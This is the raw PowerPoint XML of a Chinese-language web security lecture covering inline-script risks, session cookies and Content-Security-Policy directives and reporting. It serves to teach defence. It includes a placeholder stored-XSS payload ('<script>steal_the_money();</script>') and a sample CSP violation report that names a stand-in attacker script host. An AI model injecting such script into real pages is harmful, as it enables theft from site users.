              <a:gd name="adj2" fmla="val 3135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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>steal_the_money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0495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0" grpId="0" animBg="1"/>
      <p:bldP spid="8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内联脚本的危害性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尽管使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储转发攻击依然可行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储攻击依赖内联脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="813" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>steal_the_money</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="813" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务端开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后，浏览器的工作模式发生变化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="625404" lvl="1" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>都被禁止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="625404" lvl="1" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setTimeout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“string”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setInterval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“string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, …)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等都被禁止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56"/>
              <a:t>Session Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3656"/>
              <a:t>流程示例</a:t>
            </a:r>
            <a:endParaRPr sz="3656"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117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TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>用户登录，输入账号密码</a:t>
            </a:r>
          </a:p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TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>服务器验证用户账号密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>是否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>正确，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>创建一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>存储在数据库（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-HK" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-HK" altLang="zh-CN" sz="2000">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502779" lvl="1" indent="-251390" defTabSz="330398">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>：设置什么内容才能安全（防伪造和重放）？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502779" lvl="1" indent="-251390" defTabSz="330398">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-HK" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>HMAC(session ID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>签名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-HK" sz="1800">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p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TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>放进 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>在用户浏览器中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p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CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>再次发起请求，服务器直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>对用户进行验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319225" indent="-319225" defTabSz="330398">
              <a:spcBef>
                <a:spcPts val="1314"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>用户登出，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>在客户端和服务器端都被销毁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>ookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>过期也会导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>的失效</a:t>
            </a:r>
            <a:endParaRPr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72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5840" y="2881557"/>
            <a:ext cx="8642480" cy="1048123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2950"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!-- amazing.html --&gt;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/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 err="1">
                <a:solidFill>
                  <a:srgbClr val="BDB76B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'amazing.js'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/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>
                <a:solidFill>
                  <a:srgbClr val="BDB76B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'amazing'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Am I amazing?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&lt;/button&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1625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5840" y="750096"/>
            <a:ext cx="8642480" cy="1798328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2950"/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&lt;script&gt;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E28964"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	function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doAmazingThings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		alert(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'YOU AM AMAZING!'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); </a:t>
            </a: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	}</a:t>
            </a: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&lt;/script&gt;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>
              <a:tabLst>
                <a:tab pos="374055" algn="l"/>
                <a:tab pos="742950" algn="l"/>
                <a:tab pos="1117005" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pP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&lt;button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 err="1">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onclick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doAmazingThings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Am I amazing?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/button&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1625" dirty="0"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5840" y="3949311"/>
            <a:ext cx="8642480" cy="2298465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742950"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// amazing.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1625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defTabSz="742950"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E28964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doAmazingThings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() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="742950">
              <a:tabLst>
                <a:tab pos="374055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	alert(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'YOU AM AMAZING!'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defTabSz="742950">
              <a:tabLst>
                <a:tab pos="374055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</a:p>
          <a:p>
            <a:pPr defTabSz="742950">
              <a:tabLst>
                <a:tab pos="374055" algn="l"/>
              </a:tabLst>
            </a:pP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document.addEventListener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25" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOMContentReady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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E28964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 () { 	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'amazing'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) .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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'click'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25" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>doAmazingThings</a:t>
            </a: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pPr defTabSz="742950">
              <a:tabLst>
                <a:tab pos="374055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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625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867080" y="902923"/>
            <a:ext cx="2908624" cy="746337"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62119"/>
              <a:gd name="adj2" fmla="val 1013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CSP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ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>开启时不允许使用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286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关键字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配合源使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘none’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：禁止该条款下的所有访问</a:t>
            </a:r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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>self’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>允许源到自身的访问</a:t>
            </a:r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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsafe-inline’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：允许源使用内联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：允许源使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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28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CSP动作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411867"/>
            <a:ext cx="8543925" cy="1253411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当违规情况出现时：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作被阻止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（可选）事件报告被发送到指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL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1038" y="1716911"/>
            <a:ext cx="8543925" cy="547986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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E28964"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r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report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>uri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   /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>my_amazing_csp_report_parser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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="163" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3575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1038" y="3685059"/>
            <a:ext cx="8543925" cy="2548533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/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{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csp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-report"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{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"document-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uri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"http://example.org/page.html"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,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"referrer"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"http://evil.example.com/"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, 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"blocked-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uri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"http://evil.example.com/evil.js"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, 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"violated-directive"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"script-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src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 'self' https://apis.google.com"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, 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	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"original-policy"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: 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"script-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src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 'self' https://apis.google.com; report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>uri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 					http://example.org/my_amazing_csp_report_parser"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="742950" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="374055" algn="l"/>
                <a:tab pos="742950" algn="l"/>
              </a:tabLst>
            </a:pP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}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1625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29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实例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1037" y="1378431"/>
            <a:ext cx="8543925" cy="3548807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altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E28964"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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*;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="t"/>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 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'unsafe-inline'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'unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>eval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'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https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="t"/>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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*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'unsafe-inline’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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="t"/>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
